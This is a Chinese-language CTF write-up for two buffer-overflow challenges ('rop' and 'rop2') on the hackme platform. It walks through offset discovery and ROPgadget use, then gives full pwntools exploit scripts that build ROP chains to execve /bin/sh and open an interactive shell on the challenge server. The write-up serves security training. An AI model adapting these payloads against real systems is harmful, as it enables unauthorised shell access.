题目来源：国外的一个ctf平台hackme

rop

hint: ROP buffer overflow
防护机制：

拖到IDA反编译一下

可以看到有很多函数 ，不管是用到的还是没用的都有，说明它编译时用的是静态连接
我们可以通过ROPgadget 来直接构造ropchain
命令为 ROPgadget –binary rop –ropchain

栈的大小可以通过peda的pattern search 来找到
先生成 长度为100的字符串 pattern create 100
然后执行程序

栈的大小为12
exp:

from pwn import *  
from struct import pack  
sh = remote('hackme.inndy.tw',7704)  
junk = 'a'*12 + "BBBB" # junk + ebp  

p = junk  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea060) # @ .data  
p += pack('<I', 0x080b8016) # pop eax ; ret  
p += '/bin'  
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea064) # @ .data + 4  
p += pack('<I', 0x080b8016) # pop eax ; ret  
p += '//sh'  
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea068) # @ .data + 8  
p += pack('<I', 0x080492d3) # xor eax, eax ; ret  
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x080481c9) # pop ebx ; ret  
p += pack('<I', 0x080ea060) # @ .data  
p += pack('<I', 0x080de769) # pop ecx ; ret  
p += pack('<I', 0x080ea068) # @ .data + 8  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea068) # @ .data + 8  
p += pack('<I', 0x080492d3) # xor eax, eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0806c943) # int 0x80  

sh.sendline(p)  
sh.interactive()  

rop2

hint：ROPgadget not working anymore
说明不可以再通过ROPgadget来获取ropchain了
检查下防护机制 只开启了NX

简单运行了一下程序：

程序要求你输入一串字符串 然后打印出了一堆东西

将程序拖到ida中，来一手f5大法

发现了syscall函数 ，查了一下发现程序中的syscall(4,1,&v4,42) 和syscall(3,0,&v1,1024) 分别调用了write()函数和read函数的系统调用

解题思路：
将syscall中的第一个参数设置为execve()函数的调用号，第二个

参数设置为“/bin/sh”参数的地址 来执行execve()获取shell

execve()函数的系统调用号 为0xb

exp:

from pwn import*  
p = remote('hackme.inndy.tw',7703)  
elf = ELF('./rop2')  
bss = elf.bss()  
syscall = elf.symbols['syscall']  
overflow = elf.symbols['overflow']   

p.recv()  
payload = 'a'*0xC + 'bbbb' + p32(syscall) + p32(overflow) # junk + target_address  + return_address  
payload += p32(3) + p32(0) + p32(bss) + p32(8) #syscall(3,0,bss_add,8)  
p.send(payload)  
p.send("/bin/sh\x00")  

payload1 = 'a'*0xc + "BBBB" + p32(syscall)  
payload1 += p32(overflow)+ p32(0xb) + p32(bss) + p32(0) + p32(0)  #syscall(0xb,bss_add,0,0) = execve("bin/sh",0,0)  

p.send(payload1)  
p.interactive()